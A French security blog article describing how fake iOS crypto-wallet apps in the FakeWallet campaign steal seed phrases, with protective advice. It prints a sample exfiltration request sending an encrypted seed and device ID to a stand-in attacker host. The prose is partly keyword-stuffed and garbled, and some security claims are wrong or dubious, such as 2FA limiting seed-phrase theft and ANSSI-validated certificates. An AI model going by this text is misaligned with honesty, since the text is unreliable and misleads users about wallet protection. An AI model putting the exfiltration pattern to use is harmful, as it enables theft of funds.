Comment les applications iOS malveillantes volent vos cryptomonnaies : le cas du magasin Apple en Chine

Célestine Rochefour

Le phénomène des applications iOS malveillantes vol de cryptomonnaies

“Selon le rapport de Kaspersky 2025, 38 % des attaques ciblant les portefeuilles crypto en Asie proviennent d’applications iOS malveillantes.”

En 2026, cyberattaques bancaires en 2026 la cybersécurité continue de révéler des scénarios où des acteurs malveillants s’infiltrent dans les plateformes officielles pour dérober des actifs numériques. Les applications iOS malveillantes vol de cryptomonnaies constituent une menace concrète, illustrée par la campagne FakeWallet qui a contaminé l’Apple App Store destiné au marché chinois. Dans cet article, nous décortiquons les techniques employées, les impacts financiers et les mesures de protection à adopter.

Méthodes d’imitation et typosquatting

L’une des stratégies les plus répandues consiste à exploiter le typosquatting, c’est-à-dire l’enregistrement de noms similaires à des marques connues (ex. : “MetaMask” devient “MetaMast”). Les victimes, persuadées d’obtenir une version officielle, téléchargent l’application frauduleuse depuis l’App Store. Cette technique, combinée à une fausse identité visuelle (logos, captures d’écran), rend la distinction difficile, même pour les utilisateurs avertis.

Utilisation abusive des provisioning profile

Un autre vecteur d’injection réside dans l’abus du provisioning profile, fonctionnalité légitime d’Apple permettant aux entreprises de déployer des applications internes. Les attaquants contournent les contrôles d’Apple en signant leurs code malveillants avec des profils d’entreprise falsifiés, facilitant ainsi le sideloading sur les appareils iOS. Cette méthode a déjà été observée dans l’opération SparkKitty (CVE‑2026‑33032) et se retrouve dans FakeWallet.

Analyse détaillée de la campagne FakeWallet

“Kaspersky a classé les 26 applications étudiées sous le nom de campagne FakeWallet, les liant à l’opération SparkKitty qui active depuis l’année précédente.”

Fonctionnement du vol de seed phrase

Une fois l’application ouverte, l’utilisateur est redirigé vers une page de phishing imitant le portail officiel du portefeuille. Le code injecté intercepte les seed phrases lors de la création ou de la récupération du wallet, puis les chiffre à l’aide d’algorithmes RSA et Base64 avant de les transmettre à l’infrastructure de l’attaquant. Ces phrases, constituées de 12 à 24 mots, sont la clé unique permettant de restaurer le portefeuille sur tout appareil.

Canaux de diffusion et contournement des restrictions chinoises

En Chine, les applications de portefeuille crypto sont généralement interdites. Les cybercriminels ont donc publié les faux wallets sous des catégories inoffensives - jeux ou calculatrices - afin de masquer leurs intentions. Cette ruse vise à exploiter la confiance des utilisateurs qui pensent contourner la censure. Le manque de filtrage géographique du code malveillant signifie que la menace peut rapidement s’étendre à d’autres marchés.

Conséquences pour les utilisateurs et les entreprises

Pertes financières chiffrées

Le mois dernier, un portefeuille frauduleux nommé “Ledger” a été retiré de l’App Store après avoir volé 9,5 millions de dollars à 50 utilisateurs macOS. En France, le ministère de l’Économie rapporte que les pertes liées aux vols de cryptomonnaies ont dépassé 150 millions d’euros en 2024, dont une part importante provient d’applications mobiles compromis.

Impact sur la confiance et la conformité

Ces incidents sapent la confiance des utilisateurs dans les écosystèmes mobiles et compliquent la conformité aux exigences du RGPD et des normes ISO 27001. Les entreprises qui offrent des services de portefeuille numérique doivent démontrer des contrôles rigoureux de l’authentification et de la protection des données, sous peine de sanctions administratives et de dommages réputationnels.

Mesures de protection recommandées

Bonnes pratiques de vérification d’applications

  • Vérifiez l’éditeur : ne téléchargez qu’à partir du site officiel du portefeuille, même si l’app figure sur l’App Store.
  • Analysez les autorisations demandées : une application de portefeuille ne devrait pas requérir un accès complet à la localisation ou aux contacts.
  • Comparez les icônes et captures d’écran avec celles présentes sur le site du développeur.
  • Utilisez des solutions de sécurité mobile certifiées par l’ANSSI qui détectent les comportements anormaux.
  • Activez l’authentification à deux facteurs (2FA) pour vos comptes crypto afin de réduire l’impact d’une compromission de seed phrase.

Outils de détection et cadres de sécurité

Les 12 meilleurs outils de cybersécurité 2026

CritèreApplication légitimeApplication FakeWallet
Nom de l’éditeurVérifié (ex. : MetaMask Inc.)Aucun ou similaire douteux
Signature du codeApple-signed, non-modifiéeSignée avec un provisioning profile suspect
Demande d’autorisationsMinimal (ex. : réseau)Accès étendu (photos, contacts)
Présence de certificats SSLValidés par ANSSICertificats auto-signés ou expirés

Les organisations peuvent s’appuyer sur les cadres de l’ISO 27001 pour instaurer une politique de gestion des actifs numériques, incluant la classification des risques liés aux applications mobiles. En combinant ces standards avec les recommandations de l’ANSSI - telles que l’utilisation de listes blanches d’applications approuvées - les entreprises renforcent leur posture de sécurité.

Mise en œuvre - guide pas à pas pour sécuriser votre portefeuille

  1. Auditez vos applications installées : utilisez un outil de gestion des appareils mobiles (MDM) pour lister toutes les applications présentes sur vos iPhones.
  2. Supprimez les applications suspectes : désinstallez immédiatement toute application qui ne correspond pas aux critères du tableau ci-dessus.
  3. Réinitialisez vos seed phrases : si vous avez utilisé un portefeuille compromis, créez un nouveau wallet, générez une nouvelle seed phrase et transférez vos actifs.
  4. Activez les alertes de sécurité : configurez des notifications sur les mouvements de fonds via votre exchange ou portefeuille.
  5. Formez les utilisateurs : organisez des sessions de sensibilisation sur les risques du typosquatting et l’importance de télécharger les apps depuis les sources officielles.
{
  "malicious_request": {
    "url": "https://malicious.example.com/collect",
    "method": "POST",
    "payload": {
      "encrypted_seed": "BASE64_ENCODED_RSA",
      "device_id": "1234567890ABCDEF"
    }
  }
}

Le fragment ci-dessus montre un exemple typique de requête que les applications FakeWallet envoient aux serveurs de l’attaquant : le seed phrase est chiffré (RSA) puis encodé en Base64 avant d’être transmis via une connexion HTTPS.

Conclusion - Protégez vos actifs numériques dès maintenant

En 2026, les cybermenaces évoluent rapidement, et les applications iOS malveillantes vol de cryptomonnaies démontrent que même les stores officiels ne sont pas à l’abri des attaques sophistiquées. En suivant les recommandations présentées - vérification rigoureuse des éditeurs, utilisation d’outils de détection certifiés, respect des standards ANSSI, ISO 27001 et RGPD - vous pouvez limiter les risques et protéger vos investissements numériques. Ne laissez aucune seed phrase exposée : la vigilance est votre meilleure défense.